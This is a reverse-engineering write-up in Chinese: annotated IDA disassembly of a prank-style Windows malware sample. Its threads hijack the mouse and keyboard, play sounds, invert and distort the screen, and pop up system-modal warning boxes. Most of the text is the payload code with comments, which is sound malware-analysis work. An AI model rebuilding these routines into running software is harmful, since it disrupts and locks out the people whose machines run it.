.data:004050A4                 dd offset aMsconfig     ; "msconfig"
.data:004050A8                 dd offset aMspaint      ; "mspaint"
.data:004050AC                 dd offset aDevmgmtMsc   ; "devmgmt.msc"
.data:004050B0                 dd offset aControl      ; "control"
.data:004050B4                 dd offset aMmc          ; "mmc"

线程2:
随机设置鼠标位置

asm
; ---------------------------------------------------------------------------
; sub_40156D (thread 2): nudge the mouse cursor by a random offset.
;   step   = arg_4 / 898h (2200) + 2        (arg_4's meaning is not visible
;                                            here - presumably a counter passed
;                                            by the dispatcher; confirm)
;   dy     = (rand % 3 - 1) * (rand % step) ; each factor in {-1,0,1} x [0,step)
;   dx     = (rand % 3 - 1) * (rand % step)
;   SetCursorPos(Point.x + dx, Point.y + dy) ; Point from GetCursorPos
;   return 2 (eax; presumably a delay for the caller - caller not shown)
; rand = sub_401A55, result in eax.  All divisions are signed (cdq/idiv),
; so a negative rand would give a negative remainder; sub_401A55's range is
; not visible here.  Locals: 8 bytes (two push ecx) hold POINT.  Callee-saved
; ebx/esi/edi are pushed and popped; plain retn, so the caller cleans the
; arguments (not a raw ThreadProc entry - confirm with the caller).
; ---------------------------------------------------------------------------
.text:0040156D                 push    ebp
.text:0040156E                 mov     ebp, esp
.text:00401570                 push    ecx             ; reserve 8 bytes for Point
.text:00401571                 push    ecx
.text:00401572                 push    ebx
.text:00401573                 push    esi
.text:00401574                 push    edi
.text:00401575                 lea     eax, [ebp+Point]
.text:00401578                 push    eax             ; lpPoint
.text:00401579                 call    ds:GetCursorPos ; current cursor position -> Point
.text:0040157F                 mov     eax, [ebp+arg_4]
.text:00401582                 mov     ecx, 898h       ; 2200
.text:00401587                 cdq
.text:00401588                 idiv    ecx             ; eax = arg_4 / 2200
.text:0040158A                 lea     esi, [eax+2]    ; esi = step = arg_4 / 2200 + 2 (never 0 for arg_4 >= 0)
.text:0040158D                 call    sub_401A55      ; rand
.text:00401592                 cdq
.text:00401593                 idiv    esi
.text:00401595                 mov     edi, edx        ; edi = rand % step   (y magnitude)
.text:00401597                 call    sub_401A55      ; rand
.text:0040159C                 cdq
.text:0040159D                 idiv    esi
.text:0040159F                 mov     esi, edx        ; esi = rand % step   (x magnitude; step itself is discarded)
.text:004015A1                 call    sub_401A55      ; rand
.text:004015A6                 push    3
.text:004015A8                 cdq
.text:004015A9                 pop     ebx             ; ebx = 3
.text:004015AA                 idiv    ebx
.text:004015AC                 dec     edx             ; edx = rand % 3 - 1  -> y direction in {-1,0,1}
.text:004015AD                 imul    edx, edi        ; dy = direction * magnitude
.text:004015B0                 add     edx, [ebp+Point.y]
.text:004015B3                 push    edx             ; Y = Point.y + dy
.text:004015B4                 call    sub_401A55      ; rand
.text:004015B9                 cdq
.text:004015BA                 idiv    ebx
.text:004015BC                 dec     edx             ; edx = rand % 3 - 1  -> x direction
.text:004015BD                 imul    edx, esi        ; dx = direction * magnitude
.text:004015C0                 add     edx, [ebp+Point.x]
.text:004015C3                 push    edx             ; X = Point.x + dx
.text:004015C4                 call    ds:SetCursorPos ; move the cursor; result not checked
.text:004015CA                 push    2
.text:004015CC                 pop     eax             ; return value = 2
.text:004015CD                 pop     edi
.text:004015CE                 pop     esi
.text:004015CF                 pop     ebx
.text:004015D0                 mov     esp, ebp
.text:004015D2                 pop     ebp
.text:004015D3                 retn
.text:004015D3 sub_40156D      endp

线程3:
控制键盘,模拟键盘事件

asm
; ---------------------------------------------------------------------------
; sub_4017A5 (thread 3): inject one random keystroke with SendInput.
;   INPUT.type = INPUT_KEYBOARD (1)
;   wVk        = rand % 2Ah + 30h   -> virtual-key codes 30h..59h ('0'..'9',
;                ':'..'@', 'A'..'Y'); the word written at +4 is where IDA's
;                "anonymous_0" (the ki.wVk slot) sits
;   return     = rand % 190h + 12Ch -> 300..699 (eax; presumably a delay for
;                the caller - caller not shown)
; Only .type and the wVk word are ever written: the remaining 1Ch-byte INPUT
; fields (wScan, dwFlags, time, dwExtraInfo) are left as whatever was on the
; stack, since the frame is never zeroed.  No KEYEVENTF_KEYUP is set here.
; Leaf function: no callee-saved registers touched, no locals beyond INPUT.
; ---------------------------------------------------------------------------
.text:004017A5 pInputs         = tagINPUT ptr -1Ch
.text:004017A5
.text:004017A5                 push    ebp
.text:004017A6                 mov     ebp, esp
.text:004017A8                 sub     esp, 1Ch        ; one INPUT structure (28 bytes on 32-bit), NOT zeroed
.text:004017AB                 mov     [ebp+pInputs.type], 1 ; INPUT_KEYBOARD
.text:004017B2                 call    sub_401A55      ; rand
.text:004017B7                 push    2Ah ; '*'
.text:004017B9                 pop     ecx             ; ecx = 42
.text:004017BA                 cdq
.text:004017BB                 idiv    ecx             ; edx = rand % 42
.text:004017BD                 push    1Ch             ; cbSize = sizeof(INPUT)
.text:004017BF                 lea     eax, [ebp+pInputs]
.text:004017C2                 add     edx, 30h ; '0'  ; edx = 30h + rand % 42 = virtual-key code
.text:004017C5                 push    eax             ; pInputs
.text:004017C6                 push    1               ; cInputs
.text:004017C8                 mov     word ptr [ebp+pInputs.anonymous_0], dx ; ki.wVk = edx (low word)
.text:004017CC                 call    ds:SendInput    ; inject the keystroke; result not checked
.text:004017D2                 call    sub_401A55      ; rand
.text:004017D7                 cdq
.text:004017D8                 mov     ecx, 190h       ; 400
.text:004017DD                 idiv    ecx             ; edx = rand % 400
.text:004017DF                 lea     eax, [edx+12Ch] ; return 300 + rand % 400
.text:004017E5                 mov     esp, ebp
.text:004017E7                 pop     ebp
.text:004017E8                 retn
.text:004017E8 sub_4017A5      endp

线程4:
播放声音

asm
; ---------------------------------------------------------------------------
; sub_4016A0 (thread 4): play one random sound from the pszSound table.
;   PlaySoundA(pszSound[rand % dword_402114], NULL, SND_ASYNC)
;   return rand % 14h + 14h -> 20..39 (eax; presumably a delay for the
;   caller - caller not shown)
; dword_402114 is presumably the table's entry count (not visible here).
; Note the argument order: fdwSound and hmod are pushed BEFORE sub_401A55 is
; called to compute the third argument, so this relies on sub_401A55 leaving
; the caller's pushed arguments intact.  The first modulo is unsigned (div),
; the second signed (idiv).  Leaf function with no frame.
; ---------------------------------------------------------------------------
.text:004016A0 sub_4016A0      proc near               ; DATA XREF: .data:00405148↓o
.text:004016A0                 push    1               ; fdwSound = SND_ASYNC
.text:004016A2                 push    0               ; hmod = NULL
.text:004016A4                 call    sub_401A55      ; rand (eax)
.text:004016A9                 xor     edx, edx        ; edx:eax = rand, unsigned
.text:004016AB                 div     ds:dword_402114 ; edx = rand % dword_402114 -> table index
.text:004016B1                 push    pszSound[edx*4] ; pszSound = table entry edx
.text:004016B8                 call    ds:PlaySoundA   ; start the sound asynchronously; result not checked
.text:004016BE                 call    sub_401A55      ; rand
.text:004016C3                 push    14h
.text:004016C5                 cdq
.text:004016C6                 pop     ecx             ; ecx = 20
.text:004016C7                 idiv    ecx             ; edx = rand % 20
.text:004016C9                 lea     eax, [ecx+edx]  ; return 20 + rand % 20
.text:004016CC                 retn
.text:004016CC sub_4016A0      endp

线程5:
获取窗口相关信息,不知道干什么

asm
; ---------------------------------------------------------------------------
; sub_4015D4 (thread 5): invert the colours of the whole desktop.
;   hdc = GetWindowDC(GetDesktopWindow())
;   GetWindowRect(desktop, &Rect)
;   BitBlt(hdc, 0, 0, width, height, hdc, 0, 0, NOTSRCCOPY)
;   ReleaseDC(desktop, hdc)
;   return 64h = 100 (eax; presumably a delay for the caller - caller not shown)
; rop 330008h is NOTSRCCOPY (dest = NOT source); since source and destination
; are the same DC and rectangle, the visible effect is a screen colour
; inversion - this is the "window colour change" the overview describes.
; Locals: 10h bytes = RECT.  esi = hdc, edi = desktop HWND.
; ---------------------------------------------------------------------------
.text:004015D4                 push    ebp
.text:004015D5                 mov     ebp, esp
.text:004015D7                 sub     esp, 10h        ; RECT
.text:004015DA                 push    esi
.text:004015DB                 push    edi
.text:004015DC                 call    ds:GetDesktopWindow
.text:004015E2                 mov     edi, eax        ; edi = desktop window
.text:004015E4                 push    edi             ; hWnd
.text:004015E5                 call    ds:GetWindowDC
.text:004015EB                 mov     esi, eax        ; esi = desktop DC (not NULL-checked)
.text:004015ED                 lea     eax, [ebp+Rect]
.text:004015F0                 push    eax             ; lpRect
.text:004015F1                 push    edi             ; hWnd
.text:004015F2                 call    ds:GetWindowRect ; desktop bounds -> Rect
.text:004015F8                 mov     eax, [ebp+Rect.bottom]
.text:004015FB                 xor     ecx, ecx        ; ecx = 0 for all x/y arguments
.text:004015FD                 sub     eax, [ebp+Rect.top] ; eax = height
.text:00401600                 push    330008h         ; rop = NOTSRCCOPY
.text:00401605                 push    ecx             ; y1
.text:00401606                 push    ecx             ; x1
.text:00401607                 push    esi             ; hdcSrc = same DC
.text:00401608                 push    eax             ; cy = height
.text:00401609                 mov     eax, [ebp+Rect.right]
.text:0040160C                 sub     eax, [ebp+Rect.left] ; eax = width
.text:0040160F                 push    eax             ; cx = width
.text:00401610                 push    ecx             ; y
.text:00401611                 push    ecx             ; x
.text:00401612                 push    esi             ; hdc
.text:00401613                 call    ds:BitBlt       ; in-place NOT of the whole screen
.text:00401619                 push    esi             ; hDC
.text:0040161A                 push    edi             ; hWnd
.text:0040161B                 call    ds:ReleaseDC
.text:00401621                 push    64h ; 'd'
.text:00401623                 pop     eax             ; return value = 100
.text:00401624                 pop     edi
.text:00401625                 pop     esi
.text:00401626                 mov     esp, ebp
.text:00401628                 pop     ebp
.text:00401629                 retn
.text:00401629 sub_4015D4      endp
.text:00401629

线程6:
创建线程运行 sub_401994:该线程先对自身线程安装 WH_CBT 钩子(idHook=5,回调 fn 本文未列出),再弹出系统模态(MB_SYSTEMMODAL|MB_ICONWARNING)的 MessageBoxW "Still using this computer?",关闭后卸载钩子。注意 CreateThread 返回的句柄既未检查也未关闭。

asm
.text:0040162A
; sub_40162A -- "thread 6" worker. Spawns sub_401994 (the "Still using this
; computer?" message box) on a fresh thread, then derives the return value
; from (sub_401A55() % 30) and the thread argument. The CreateThread handle is
; neither checked nor closed, so every invocation leaks one handle.
.text:0040162A                 push    ebp
.text:0040162B                 mov     ebp, esp
.text:0040162D                 push    ecx             ; reserve 8 bytes of locals: var_4 and the
.text:0040162E                 push    ecx             ; qword scratch slot at [ebp-8]
.text:0040162F                 xor     eax, eax
.text:00401631                 push    eax             ; lpThreadId = NULL
.text:00401632                 push    eax             ; dwCreationFlags = 0 (start immediately)
.text:00401633                 push    eax             ; lpParameter = NULL
.text:00401634                 push    offset sub_401994 ; lpStartAddress = message-box routine below
.text:00401639                 push    1000h           ; dwStackSize = 0x1000 bytes
.text:0040163E                 push    eax             ; lpThreadAttributes = NULL
.text:0040163F                 call    ds:CreateThread ; handle in eax is discarded (never closed)
.text:00401645                 call    sub_401A55      ; not in this listing; result is only used mod 30, presumably a PRNG (TODO confirm)
.text:0040164A                 push    1Eh
.text:0040164C                 cdq                     ; sign-extend eax into edx:eax for idiv
.text:0040164D                 pop     ecx             ; ecx = 30
.text:0040164E                 idiv    ecx
.text:00401650                 mov     [ebp+var_4], edx ; var_4 = value % 30
.text:00401653                 fild    [ebp+var_4]     ; st0 = (double)(value % 30)
.text:00401656                 fstp    qword ptr [ebp-8] ; store/reload pair: compiler's int->double spill
.text:00401659                 fld     qword ptr [ebp-8]
.text:0040165C                 fild    [ebp+arg_0]     ; st0 = (double)arg_0, st1 = value % 30
.text:0040165F                 fstp    qword ptr [ebp-8]
.text:00401662                 fld     qword ptr [ebp-8]
.text:00401665                 fmul    ds:dbl_403A28   ; st0 = arg_0 * dbl_403A28   (constant values not in this listing)
.text:0040166B                 fadd    ds:dbl_403A30   ; st0 += dbl_403A30
.text:00401671                 fdivr   ds:dbl_403A88   ; st0 = dbl_403A88 / st0
.text:00401677                 fadd    ds:dbl_403A60   ; st0 += dbl_403A60
.text:0040167D                 faddp   st(1), st       ; st0 = (value % 30) + dbl_403A60 + dbl_403A88 / (arg_0*dbl_403A28 + dbl_403A30)
.text:0040167F                 call    sub_401B09      ; not in this listing; takes st0, leaves an integer in eax which becomes this
.text:00401684                 mov     esp, ebp        ; routine's return value (presumably a double->int helper, TODO confirm)
.text:00401686                 pop     ebp
.text:00401687                 retn
.text:00401687 sub_40162A      endp
asm
; sub_401994 -- thread entry started by sub_40162A (stdcall, one DWORD arg,
; hence `retn 4`). Installs a WH_CBT hook (idHook = 5) limited to this thread,
; shows a system-modal warning box, then removes the hook. The hook procedure
; `fn` is not in this listing; because the hook is scoped to the thread that
; creates the message box, it presumably intercepts the box's own window
; events (e.g. to reposition it) -- TODO confirm from fn.
.text:00401994                 push    esi
.text:00401995                 call    ds:GetCurrentThreadId
.text:0040199B                 push    eax             ; dwThreadId = this thread only (not a global hook)
.text:0040199C                 push    0               ; hmod = NULL (allowed for a thread-local hook)
.text:0040199E                 push    offset fn       ; lpfn = hook procedure (not in this listing)
.text:004019A3                 push    5               ; idHook = 5 = WH_CBT
.text:004019A5                 call    ds:SetWindowsHookExW
.text:004019AB                 push    1030h           ; uType = MB_SYSTEMMODAL (0x1000) | MB_ICONWARNING (0x30): topmost box
.text:004019B0                 push    offset aLol     ; "lol"  (caption)
.text:004019B5                 push    offset aStillUsingThis ; "Still using this computer?" (text)
.text:004019BA                 push    0               ; hWnd = no owner window
.text:004019BC                 mov     esi, eax        ; esi = HHOOK (unchecked; NULL on failure only makes the unhook fail too)
.text:004019BE                 call    ds:MessageBoxW  ; blocks this thread until the box is dismissed
.text:004019C4                 push    esi             ; hhk
.text:004019C5                 call    ds:UnhookWindowsHookEx
.text:004019CB                 xor     eax, eax        ; thread exit code 0
.text:004019CD                 pop     esi
.text:004019CE                 retn    4               ; pop lpParameter (stdcall ThreadProc)
.text:004019CE sub_401994      endp

线程7:
每次调用在鼠标位置居中绘制系统错误图标(LoadIconW(NULL, 0x7F01) = IDI_HAND),并且当 随机数 % N == 0 时(N 由线程参数经浮点运算得出)在屏幕随机位置再画一个警告图标(0x7F03 = IDI_EXCLAMATION)。函数返回 2。

asm
; sub_401866 -- "thread 7" worker. Draws the stock error icon (IDI_HAND) centred
; on the mouse cursor on every call and, only when (random % N) == 0 where N is
; derived from the thread argument, a stock warning icon (IDI_EXCLAMATION) at a
; random screen position. Returns 2 (presumably the delay before the next call;
; the dispatcher is not in this listing, TODO confirm).
.text:00401866                 push    ebp
.text:00401867                 mov     ebp, esp
.text:00401869                 sub     esp, 14h        ; locals: hWnd, POINT Point, var_14 (double)
.text:0040186C                 push    ebx
.text:0040186D                 push    esi
.text:0040186E                 mov     esi, ds:GetSystemMetrics
.text:00401874                 push    edi
.text:00401875                 push    0Bh             ; nIndex = 11 = SM_CXICON
.text:00401877                 call    esi ; GetSystemMetrics
.text:00401879                 cdq                     ; cdq / sub / sar 1 = signed divide by 2
.text:0040187A                 sub     eax, edx
.text:0040187C                 mov     edi, eax
.text:0040187E                 push    0Ch             ; nIndex = 12 = SM_CYICON
.text:00401880                 sar     edi, 1          ; edi = icon width / 2
.text:00401882                 call    esi ; GetSystemMetrics
.text:00401884                 cdq
.text:00401885                 sub     eax, edx
.text:00401887                 mov     esi, eax
.text:00401889                 sar     esi, 1          ; esi = icon height / 2
.text:0040188B                 call    ds:GetDesktopWindow
.text:00401891                 push    eax             ; hWnd
.text:00401892                 mov     [ebp+hWnd], eax ; kept for ReleaseDC
.text:00401895                 call    ds:GetWindowDC
.text:0040189B                 mov     ebx, eax        ; ebx = desktop DC (unchecked)
.text:0040189D                 lea     eax, [ebp+Point]
.text:004018A0                 push    eax             ; lpPoint
.text:004018A1                 call    ds:GetCursorPos ; Point = current cursor position
.text:004018A7                 push    7F01h           ; lpIconName = MAKEINTRESOURCE(32513) = IDI_HAND (stock error icon)
.text:004018AC                 push    0               ; hInstance = NULL -> system icon
.text:004018AE                 call    ds:LoadIconW
.text:004018B4                 push    eax             ; hIcon
.text:004018B5                 mov     eax, [ebp+Point.y]
.text:004018B8                 sub     eax, esi
.text:004018BA                 push    eax             ; Y = cursor.y - icon height/2
.text:004018BB                 mov     eax, [ebp+Point.x]
.text:004018BE                 sub     eax, edi
.text:004018C0                 mov     edi, ds:DrawIcon
.text:004018C6                 push    eax             ; X = cursor.x - icon width/2 (icon centred on the cursor)
.text:004018C7                 push    ebx             ; hDC
.text:004018C8                 call    edi ; DrawIcon
.text:004018CA                 call    sub_401A55      ; not in this listing; only used via modulo below, presumably a PRNG (TODO confirm)
.text:004018CF                 fild    [ebp+arg_0]
.text:004018D2                 mov     esi, eax        ; esi = random value
.text:004018D4                 fstp    [ebp+var_14]
.text:004018D7                 fld     [ebp+var_14]    ; st0 = (double)arg_0
.text:004018DA                 fdiv    ds:dbl_403A78   ; st0 = arg_0 / dbl_403A78   (constant values not in this listing)
.text:004018E0                 fld1
.text:004018E2                 fadd    st(1), st       ; st1 = arg_0 / dbl_403A78 + 1
.text:004018E4                 fld     ds:dbl_403A50
.text:004018EA                 fdivrp  st(2), st       ; st1 = dbl_403A50 / (arg_0 / dbl_403A78 + 1)
.text:004018EC                 faddp   st(1), st       ; st0 = 1 + dbl_403A50 / (arg_0 / dbl_403A78 + 1) = N
.text:004018EE                 call    sub_401B09      ; not in this listing; st0 -> integer in eax (presumably double->int, TODO confirm)
.text:004018F3                 mov     ecx, eax        ; ecx = N (divisor; should the constants ever yield N == 0 this idiv raises #DE)
.text:004018F5                 mov     eax, esi
.text:004018F7                 cdq
.text:004018F8                 idiv    ecx
.text:004018FA                 test    edx, edx
.text:004018FC                 jnz     short loc_401928 ; only when random % N == 0 is the extra icon drawn
.text:004018FE                 push    7F03h           ; lpIconName = MAKEINTRESOURCE(32515) = IDI_EXCLAMATION (stock warning icon)
.text:00401903                 push    edx             ; hInstance = NULL (edx is 0 on this path)
.text:00401904                 call    ds:LoadIconW
.text:0040190A                 push    eax             ; hIcon
.text:0040190B                 call    sub_401A55
.text:00401910                 cdq
.text:00401911                 idiv    dword_405188    ; global set elsewhere; presumably the screen height saved by start (TODO confirm)
.text:00401917                 push    edx             ; Y = random % dword_405188
.text:00401918                 call    sub_401A55
.text:0040191D                 cdq
.text:0040191E                 idiv    dword_405184    ; presumably the screen width saved by start (TODO confirm)
.text:00401924                 push    edx             ; X = random % dword_405184
.text:00401925                 push    ebx             ; hDC
.text:00401926                 call    edi ; DrawIcon  ; warning icon at a random screen position
.text:00401928
.text:00401928 loc_401928:                             ; CODE XREF: sub_401866+96↑j
.text:00401928                 push    ebx             ; hDC
.text:00401929                 push    [ebp+hWnd]      ; hWnd
.text:0040192C                 call    ds:ReleaseDC
.text:00401932                 push    2               ; return value 2 (see header)
.text:00401934                 pop     eax
.text:00401935                 pop     edi
.text:00401936                 pop     esi
.text:00401937                 pop     ebx
.text:00401938                 mov     esp, ebp
.text:0040193A                 pop     ebp
.text:0040193B                 retn
.text:0040193B sub_401866      endp

线程8:
枚举桌面下的所有子窗口,对每个窗口调用 EnumFunc(回调本文未列出,具体对窗口做了什么无法从这段看出),返回 50

asm
; sub_401688 -- "thread 8" worker, referenced from the table at .data:00405168.
; Walks every descendant window of the desktop and calls EnumFunc on each.
; EnumFunc is not in this listing, so what it does to the windows cannot be
; told here. Returns 50 (presumably the delay before the next call, TODO confirm).
.text:00401688 sub_401688      proc near               ; DATA XREF: .data:00405168↓o
.text:00401688                 push    0               ; lParam = 0 (nothing passed to the callback)
.text:0040168A                 push    offset EnumFunc ; lpEnumFunc (not in this listing)
.text:0040168F                 call    ds:GetDesktopWindow
.text:00401695                 push    eax             ; hWndParent = desktop -> all top-level windows and their children
.text:00401696                 call    ds:EnumChildWindows
.text:0040169C                 push    32h ; '2'       ; return 50
.text:0040169E                 pop     eax
.text:0040169F                 retn
.text:0040169F sub_401688      endp

线程9:
用 StretchBlt(SRCCOPY)把整个屏幕画面缩小后画回 (50,50) 处、大小为 (宽-100)×(高-100) 的区域,每次调用都向中心收缩 50 像素,形成隧道式的拉伸效果(代码直接把 Rect.right/bottom 当作宽高,即假定桌面左上角为 (0,0))

asm
; sub_4017E9 -- "thread 9" worker. Uses the whole screen as the source and
; StretchBlt's it back onto the screen 50 px inset on every side (destination
; origin (50,50), size (width-100) x (height-100)), so each call shrinks the
; picture towards the centre ("tunnel" effect). Assumes Rect.left == Rect.top
; == 0: right/bottom are used directly as width/height. Nothing is checked.
.text:004017E9                 push    ebp
.text:004017EA                 mov     ebp, esp
.text:004017EC                 sub     esp, 18h        ; locals: RECT Rect, var_8 (double)
.text:004017EF                 push    esi
.text:004017F0                 push    edi
.text:004017F1                 call    ds:GetDesktopWindow
.text:004017F7                 mov     edi, eax        ; edi = desktop HWND
.text:004017F9                 push    edi             ; hWnd
.text:004017FA                 call    ds:GetWindowDC
.text:00401800                 mov     esi, eax        ; esi = desktop DC (unchecked)
.text:00401802                 lea     eax, [ebp+Rect]
.text:00401805                 push    eax             ; lpRect
.text:00401806                 push    edi             ; hWnd
.text:00401807                 call    ds:GetWindowRect
.text:0040180D                 mov     eax, [ebp+Rect.bottom] ; eax = height (bottom; top assumed 0)
.text:00401810                 mov     ecx, [ebp+Rect.right]  ; ecx = width  (right; left assumed 0)
.text:00401813                 push    0CC0020h        ; rop = SRCCOPY (0x00CC0020)
.text:00401818                 push    eax             ; hSrc = source height  (IDA's names: hSrc/wSrc = source height/width)
.text:00401819                 push    ecx             ; wSrc = source width
.text:0040181A                 push    0               ; ySrc = 0
.text:0040181C                 push    0               ; xSrc = 0 -> source = the entire screen
.text:0040181E                 push    esi             ; hdcSrc = same DC as the destination
.text:0040181F                 add     eax, 0FFFFFF9Ch ; eax = height - 100
.text:00401822                 push    eax             ; hDest = height - 100
.text:00401823                 lea     eax, [ecx-64h]  ; eax = width - 100
.text:00401826                 push    eax             ; wDest = width - 100
.text:00401827                 push    32h ; '2'       ; yDest = 50
.text:00401829                 push    32h ; '2'       ; xDest = 50
.text:0040182B                 push    esi             ; hdcDest
.text:0040182C                 call    ds:StretchBlt   ; screen := shrunk copy of itself, inset 50 px on each side
.text:00401832                 push    esi             ; hDC
.text:00401833                 push    edi             ; hWnd
.text:00401834                 call    ds:ReleaseDC
.text:0040183A                 fild    [ebp+arg_0]
.text:0040183D                 fstp    [ebp+var_8]
.text:00401840                 fld     [ebp+var_8]     ; st0 = (double)arg_0
.text:00401843                 fdiv    ds:dbl_403A48   ; st0 = arg_0 / dbl_403A48   (constant values not in this listing)
.text:00401849                 fadd    ds:dbl_403A30   ; st0 += dbl_403A30
.text:0040184F                 fdivr   ds:dbl_403A70   ; st0 = dbl_403A70 / st0
.text:00401855                 fadd    ds:dbl_403A40   ; st0 += dbl_403A40
.text:0040185B                 call    sub_401B09      ; not in this listing; st0 -> integer in eax = return value (presumably double->int, TODO confirm)
.text:00401860                 pop     edi
.text:00401861                 pop     esi
.text:00401862                 mov     esp, ebp
.text:00401864                 pop     ebp
.text:00401865                 retn
.text:00401865 sub_4017E9      endp

线程10:
随机复制屏幕区块:取随机的源坐标、随机的目标坐标和随机的尺寸(每边 < 600 像素),用 BitBlt(SRCCOPY)把桌面上的一块画面覆盖到另一处,并不是真正修改桌面颜色

asm
; sub_4016CD -- "thread 10" worker. Picks a random destination point, a random
; source point and a random block size (each side < 600 px) on the desktop and
; BitBlt's that block from source to destination with SRCCOPY, so random pieces
; of the screen get copied over other pieces. The six sub_401A55 calls are not
; in this listing; every result is reduced by a modulus, so it is presumably a
; PRNG (TODO confirm). The divisors are width-100 / height-100; a desktop of
; exactly 100 px in either dimension would make an idiv raise #DE.
.text:004016CD                 push    ebp
.text:004016CE                 mov     ebp, esp
.text:004016D0                 sub     esp, 24h        ; locals: hWnd, hdc, RECT Rect, x, y, double scratch at [ebp-14h]
.text:004016D3                 push    ebx
.text:004016D4                 push    esi
.text:004016D5                 push    edi
.text:004016D6                 call    ds:GetDesktopWindow
.text:004016DC                 mov     ebx, eax        ; ebx = desktop HWND
.text:004016DE                 push    ebx             ; hWnd
.text:004016DF                 mov     [ebp+hWnd], ebx ; kept for ReleaseDC
.text:004016E2                 call    ds:GetWindowDC
.text:004016E8                 mov     [ebp+hdc], eax  ; desktop DC (unchecked)
.text:004016EB                 lea     eax, [ebp+Rect]
.text:004016EE                 push    eax             ; lpRect
.text:004016EF                 push    ebx             ; hWnd
.text:004016F0                 call    ds:GetWindowRect ; Rect = desktop bounds
.text:004016F6                 call    sub_401A55
.text:004016FB                 mov     ecx, [ebp+Rect.right]
.text:004016FE                 add     ecx, 0FFFFFF9Ch ; ecx = width - 100
.text:00401701                 cdq
.text:00401702                 idiv    ecx
.text:00401704                 mov     [ebp+x], edx    ; x  = rnd % (width - 100)   destination x
.text:00401707                 call    sub_401A55
.text:0040170C                 mov     ecx, [ebp+Rect.bottom]
.text:0040170F                 add     ecx, 0FFFFFF9Ch ; ecx = height - 100
.text:00401712                 cdq
.text:00401713                 idiv    ecx
.text:00401715                 mov     [ebp+y], edx    ; y  = rnd % (height - 100)  destination y
.text:00401718                 call    sub_401A55
.text:0040171D                 mov     ecx, [ebp+Rect.right]
.text:00401720                 add     ecx, 0FFFFFF9Ch
.text:00401723                 cdq
.text:00401724                 idiv    ecx
.text:00401726                 mov     ebx, edx        ; x1 = rnd % (width - 100)   source x
.text:00401728                 call    sub_401A55
.text:0040172D                 mov     ecx, [ebp+Rect.bottom]
.text:00401730                 add     ecx, 0FFFFFF9Ch
.text:00401733                 cdq
.text:00401734                 idiv    ecx
.text:00401736                 mov     edi, edx        ; y1 = rnd % (height - 100)  source y
.text:00401738                 call    sub_401A55
.text:0040173D                 cdq
.text:0040173E                 mov     ecx, 258h       ; 600
.text:00401743                 idiv    ecx
.text:00401745                 mov     esi, edx        ; cx = rnd % 600             block width
.text:00401747                 call    sub_401A55
.text:0040174C                 cdq
.text:0040174D                 mov     ecx, 258h
.text:00401752                 idiv    ecx             ; edx = rnd % 600            block height
.text:00401754                 push    0CC0020h        ; rop = SRCCOPY (0x00CC0020)
.text:00401759                 push    edi             ; y1 = source y
.text:0040175A                 push    ebx             ; x1 = source x
.text:0040175B                 mov     ebx, [ebp+hdc]
.text:0040175E                 push    ebx             ; hdcSrc = desktop DC
.text:0040175F                 push    edx             ; cy = block height
.text:00401760                 push    esi             ; cx = block width
.text:00401761                 push    [ebp+y]         ; y = destination y
.text:00401764                 push    [ebp+x]         ; x = destination x
.text:00401767                 push    ebx             ; hdc = same desktop DC
.text:00401768                 call    ds:BitBlt       ; copy one random screen block over another
.text:0040176E                 push    ebx             ; hDC
.text:0040176F                 push    [ebp+hWnd]      ; hWnd
.text:00401772                 call    ds:ReleaseDC
.text:00401778                 fild    [ebp+arg_0]
.text:0040177B                 fstp    qword ptr [ebp-14h]
.text:0040177E                 fld     qword ptr [ebp-14h] ; st0 = (double)arg_0
.text:00401781                 fdiv    ds:dbl_403A48   ; st0 = arg_0 / dbl_403A48   (constant values not in this listing)
.text:00401787                 fadd    ds:dbl_403A30   ; st0 += dbl_403A30
.text:0040178D                 fdivr   ds:dbl_403A70   ; st0 = dbl_403A70 / st0
.text:00401793                 fadd    ds:dbl_403A38   ; st0 += dbl_403A38
.text:00401799                 call    sub_401B09      ; not in this listing; st0 -> integer in eax = return value (presumably double->int, TODO confirm)
.text:0040179E                 pop     edi
.text:0040179F                 pop     esi
.text:004017A0                 pop     ebx
.text:004017A1                 mov     esp, ebp
.text:004017A3                 pop     ebp
.text:004017A4                 retn
.text:004017A4 sub_4016CD      endp

本文作者:Na1r

本文链接:

版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!